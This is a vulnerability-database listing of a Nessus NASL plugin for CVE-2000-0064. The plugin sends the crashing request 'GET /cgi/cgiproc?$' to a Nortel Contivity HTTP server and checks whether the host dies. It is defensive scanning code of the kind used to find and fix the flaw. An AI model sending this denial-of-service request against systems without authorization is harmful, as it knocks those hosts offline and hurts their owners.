Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
nessusThis script is Copyright (C) 2000-2018 Tenable Network Security, Inc.NORTEL_CGIPROC_DOS.NASL
HistoryJan 20, 2000 - 12:00 a.m.

Nortel Contivity HTTP Server cgiproc Special Character DoS

2000-01-2000:00:00
This script is Copyright (C) 2000-2018 Tenable Network Security, Inc.
www.tenable.com
282
JSON

It is possible to crash the remote host by doing the HTTP request :
GET /cgi/cgiproc?$

#
# (C) Tenable Network Security, Inc.
#

include("compat.inc");

if (description)
{
  script_id(10160);
  script_version("1.38");
  script_cvs_date("Date: 2018/11/15 20:50:25");

  script_cve_id("CVE-2000-0064");
  script_bugtraq_id(938);

  script_name(english:"Nortel Contivity HTTP Server cgiproc Special Character DoS");
  script_summary(english:"Crashes the remote host");

  script_set_attribute(attribute:"synopsis", value:"The remote host is vulnerable to denial of service.");
  script_set_attribute(attribute:"description", value:
"It is possible to crash the remote host by doing the HTTP request :
GET /cgi/cgiproc?$");
  script_set_attribute(attribute:"see_also", value:"https://seclists.org/bugtraq/2000/Jan/239");
  script_set_attribute(attribute:"see_also", value:"https://packetstormsecurity.com/0001-exploits/nortel.htm");
  script_set_attribute(attribute:"solution", value:"Upgrade to VxWorks 2.60 or later.");
  script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:P");
  script_set_cvss_temporal_vector("CVSS2#E:U/RL:OF/RC:C");
  script_set_attribute(attribute:"exploitability_ease", value:"No known exploits are available");
  script_set_attribute(attribute:"exploit_available", value:"false");

  script_set_attribute(attribute:"vuln_publication_date", value:"2000/01/17");
  script_set_attribute(attribute:"plugin_publication_date", value:"2000/01/20");

  script_set_attribute(attribute:"potential_vulnerability", value:"true");
  script_set_attribute(attribute:"plugin_type", value:"remote");
  script_end_attributes();

  script_category(ACT_KILL_HOST);
  script_copyright(english:"This script is Copyright (C) 2000-2018 Tenable Network Security, Inc.");
  script_family(english:"Web Servers");

  script_dependencie("http_version.nasl", "find_service1.nasl", "no404.nasl");
  script_require_keys("Settings/ParanoidReport");
  script_require_ports("Services/www", 80);

  exit(0);
}

include("audit.inc");
include("global_settings.inc");
include("misc_func.inc");
include("http.inc");

if (report_paranoia < 2) audit(AUDIT_PARANOID);

port = get_http_port(default:80);

 if(http_is_dead(port:port))exit(0);
 is_cgi_installed3(item:"/cgi/cgiproc?$", port:port);
 sleep(5);
 if(http_is_dead(port:port, retry: 3))
 {
  security_warning(port);
  set_kb_item(name:"Host/dead",value:TRUE);
 }

Related

cve 1
cve
cve
CVE-2000-0064
2000-01-17 05:00:00
JSON
Related for NORTEL_CGIPROC_DOS.NASL
cve1